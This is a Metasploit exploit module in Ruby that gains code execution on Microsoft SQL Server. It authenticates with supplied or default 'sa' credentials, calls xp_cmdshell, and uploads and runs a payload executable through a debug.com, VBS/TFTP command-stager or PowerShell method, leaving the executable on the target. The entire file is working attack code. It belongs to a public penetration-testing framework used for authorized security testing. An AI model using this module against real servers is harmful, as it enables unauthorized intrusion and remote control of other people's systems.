modules/exploits/windows/mssql/mssql_payload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MSSQL
include Msf::Exploit::CmdStager
include Msf::OptionalSession::MSSQL
#include Msf::Exploit::CmdStagerDebugAsm
#include Msf::Exploit::CmdStagerDebugWrite
#include Msf::Exploit::CmdStagerTFTP
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server Payload Execution',
'Description' => %q{
This module executes an arbitrary payload on a Microsoft SQL Server by using
the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.
First, the original method uses Windows 'debug.com'. File size restrictions are
avoided by incorporating the debug bypass method presented by SecureStat at
Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.
A second method takes advantage of the Command Stager subsystem. This allows using
various techniques, such as using a TFTP server, to send the executable. By default
the Command Stager uses 'wcsript.exe' to generate the executable on the target.
Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
payload on the target.
NOTE: This module will leave a payload executable on the target system when the
attack is finished.
},
'Author' =>
[
'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', # original module, debug.exe method, powershell method
'jduck' # command stager mods
],
'License' => MSF_LICENSE,
'References' =>
[
# 'sa' password in logs
[ 'CVE', '2000-0402' ],
[ 'OSVDB', '557' ],
[ 'BID', '1281' ],
# blank default 'sa' password
[ 'CVE', '2000-1209' ],
[ 'OSVDB', '15757' ],
[ 'BID', '4797' ]
],
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => '2000-05-30'
))
register_options(
[
OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])
])
end
def check
if session
set_mssql_session(session.client)
end
unless session || mssql_login_datastore
vprint_status("Invalid SQL Server credentials")
return Exploit::CheckCode::Detected
end
mssql_query("select @@version", true)
if mssql_is_sysadmin
vprint_good "User #{datastore['USERNAME']} is a sysadmin"
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
ensure
disconnect
end
# This is method required for the CmdStager to work...
def execute_command(cmd, opts)
mssql_xpcmdshell(cmd, datastore['VERBOSE'])
end
def exploit
if session
set_session(session.client)
else
unless mssql_login_datastore
print_status("Invalid SQL Server credentials")
return
end
end
method = datastore['METHOD'].downcase
if (method =~ /^cmd/)
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
else
# Generate the EXE, this is the same no matter what delivery mechanism we use
exe = generate_payload_exe
# Use powershell method for payload delivery if specified
if (method =~ /^ps/) or (method =~ /^power/)
powershell_upload_exec(exe)
else
# Otherwise, fall back to the old way..
mssql_upload_exec(exe, datastore['VERBOSE'])
end
end
handler
disconnect
end
end